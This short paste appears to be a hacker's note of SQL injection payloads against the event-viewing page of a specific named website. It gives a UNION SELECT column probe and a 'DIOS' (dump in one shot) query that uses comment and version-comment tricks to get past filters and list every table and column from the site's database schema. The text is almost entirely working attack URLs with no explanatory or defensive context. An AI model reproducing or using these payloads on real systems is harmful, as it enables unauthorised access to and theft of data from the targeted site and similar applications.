
Query http://www.bovinesexclub.com/website/viewevent.php?id=1729/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,3,4,5,6,7,8,9,10,11,12,13--+
DIOS : http://www.bovinesexclub.com/website/viewevent.php?id=1729/**8**/and/**8**/0+/**8**/UniOn/**8**/sEleCT/**8**/1,2,3,4,5,6,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),8,9,10,11,12,13--+
